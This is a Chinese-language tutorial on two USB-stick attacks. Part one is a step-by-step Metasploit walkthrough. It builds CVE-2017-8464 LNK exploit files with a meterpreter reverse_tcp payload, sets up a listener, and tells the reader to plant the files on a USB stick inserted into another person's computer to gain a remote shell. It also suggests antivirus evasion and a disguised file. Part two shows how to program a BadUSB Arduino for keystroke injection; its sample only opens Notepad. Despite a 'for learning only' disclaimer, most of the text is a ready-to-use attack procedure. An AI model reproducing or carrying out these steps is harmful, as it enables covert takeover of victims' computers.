两种常见的U盘攻击手段

前言

在数字化时代，U盘成为了我们日常生活中不可或缺的存储设备之一。然而，正是因为其普遍性和便携性，U盘也成为了黑客们进行攻击的理想工具。通过利用各种技术手段，他们可以在U盘中隐藏恶意文件，或者直接从固件入手，在固件里植入恶意代码，从而获取用户的敏感信息或者破坏系统安全。这种攻击方式被称为“摆渡攻击”。下面将介绍两种常用的U盘攻击手段，希望大家能够了解相关技术，增强防范意识。

注意，以下教程仅供学习，请勿用于非法用途。

U盘文件病毒

原理：在U盘里放入病毒文件，当用户浏览病毒文件时发起攻击。

准备工具：一台电脑、Kali Linux系统（安装教程）、一个U盘（最好是空的）

启动msfconsole

1	msfconsole

搜索漏洞模块

1	search CVE-2017-8464

使用漏洞攻击模块

1	use exploit/windows/fileformat/cve_2017_8464_lnk_rce

查看是否有需要填写的信息

1	show options

设置payload

1	set payload windows/meterpreter/reverse_tcp

填写LHOST，即攻击者机器的内网IP（一般都是本机的内网IP）

1	set lhost 192.168.X.XXX

运行攻击模块

exploit

在/root/.msf4/local/目录下会生成很多病毒文件（FlashPlayerCPLApp.cpl是主文件）

将以上所有文件都复制到U盘里（一般是根目录）

使用监听模块

1	use exploit/multi/handler

设置payload

1	set payload windows/meterpreter/reverse_tcp

填写LHOST（同上）

1	set lhost 192.168.X.XXX

运行监听模块

exploit

将U盘插入别人的电脑，点击FlashPlayerCPLApp.cpl文件后就可以获得目标电脑的控制权（如果对方电脑存在LNK漏洞的话，无需手动点击，只要浏览了FlashPlayerCPLApp.cpl所在文件夹就会自动运行病毒脚本）

可以通过shell直接操作对方的电脑

以上病毒文件都没有进行免杀，所以杀毒软件可以检测出来。如果进行了免杀并且修改了FlashPlayerCPLApp.cpl文件的文件名和图标等信息，完全可以达到深度伪装的效果

U盘固件病毒

原理：使用定制的主板制作BadUSB，将恶意代码植入固件里，只要U盘一插入电脑就会运行恶意代码。直接在某宝上搜索BadUSB就可以买到伪装成普通U盘的BadUSB。

准备工具：一台电脑、Kali Linux系统（安装教程）、一个BadUSB、Arduino软件（安装教程）

将BadUSB U盘插到电脑上

打开Arduino软件，选择Leonardo开发板（一般网上买的都是这款，但也有可能是其他的，注意看商品详情）和U盘对应的端口

编写程序代码（以下是参考代码）

#include <Keyboard.h>
void setup(){//初始化 
Keyboard.begin();//开始键盘通讯 
delay(2000);//延时 
Keyboard.press(KEY_LEFT_GUI);//win键 
delay(500);
Keyboard.press('r');//r键
delay(500); 
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r'); //win+r打开运行窗口
Keyboard.press(KEY_CAPS_LOCK);//锁定大写绕过中文输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("NOTEPAD");//打开记事本
delay(1000);
Keyboard.println("HELLO WORLD!");//输出内容
delay(1000);
//Keyboard.press(KEY_RETURN); 
//Keyboard.release(KEY_RETURN);//关闭窗口
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK);//恢复小写
Keyboard.end();//结束键盘通讯 
}
void loop() {}